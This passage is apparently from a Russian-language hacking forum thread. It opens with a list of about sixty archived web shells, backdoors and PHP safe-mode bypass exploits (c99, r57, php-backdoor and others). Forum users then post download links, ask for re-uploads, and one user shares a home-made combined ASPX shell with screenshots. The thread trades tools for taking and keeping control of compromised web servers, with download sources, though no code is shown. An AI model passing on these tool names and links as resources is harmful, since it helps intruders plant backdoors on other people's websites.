c99_madnet.rar
c99_PSych0.rar
c99_w4cking.rar
Crystal.rar
ctt_sh.rar
cybershell.rar
dC3 Security Crew Shell PRiV.rar
Dive Shell 1.0 - Emperor Hacking Team.rar
DTool Pro.rar
Dx.rar
GFS web-shell ver 3.1.7 - PRiV8.rar
gfs_sh.rar
h4ntu shell [powered by tsoi].rar
iMHaPFtp.rar
ironshell.rar
JspWebshell 1.2.rar
KAdot Universal Shell v0.1.6.rar
lamashell.rar
Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.rar
load_shell.rar
matamu.rar
Moroccan Spamers Ma-EditioN By GhOsT.rar
myshell.rar
Mysql interface v1.0.rar
MySQL Web Interface Version 0.8.rar
mysql.rar
mysql_tool.rar
NCC-Shell.rar
NetworkFileManagerPHP.rar
NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.rar
nshell.rar
nstview.rar
PH Vayv.rar
PHANTASMA.rar
PHP Shell.rar
php-backdoor.rar
php-include-w-shell.rar
pHpINJ.rar
PHPJackal.rar
PHPRemoteView.rar
Private-i3lue.rar
pws.rar
r57.rar
r57_iFX.rar
r57_kartal.rar
r57_Mohajer22.rar
rootshell.rar
ru24_post_sh.rar
s72 Shell v1.1 Coding.rar
Safe0ver Shell -Safe Mod Bypass By Evilc0der.rar
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.rar
SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.rar
simple-backdoor.rar
simple_cmd.rar
SimShell 1.0 - Simorgh Security MGZ.rar
SnIpEr_SA Shell.rar
Uploader.rar
WinX Shell.rar
Worse Linux Shell.rar
zacosmall.rar

http://someshit.net/files/see___asdflll.rar
Перезалей пожалуйста все в 1 архив.
Заранее спасибо.

mspx
08.07.2009, 12:53
Делал для себя может кому понадобиться просто устал я пользоваться двумя шелами =) с99 пользуюсь исключительно ради удобства интерфейса =)
http://img248.imageshack.us/img248/1049/14772916.jpg
http://img401.imageshack.us/img401/8885/55644346.jpg
http://img525.imageshack.us/img525/6954/22808478.jpg http://img513.imageshack.us/img513/907/39059834.jpg

__http://aspx2005.narod.ru/shell.zip

mazaxaka
28.03.2010, 02:17
mspx
перезалей плз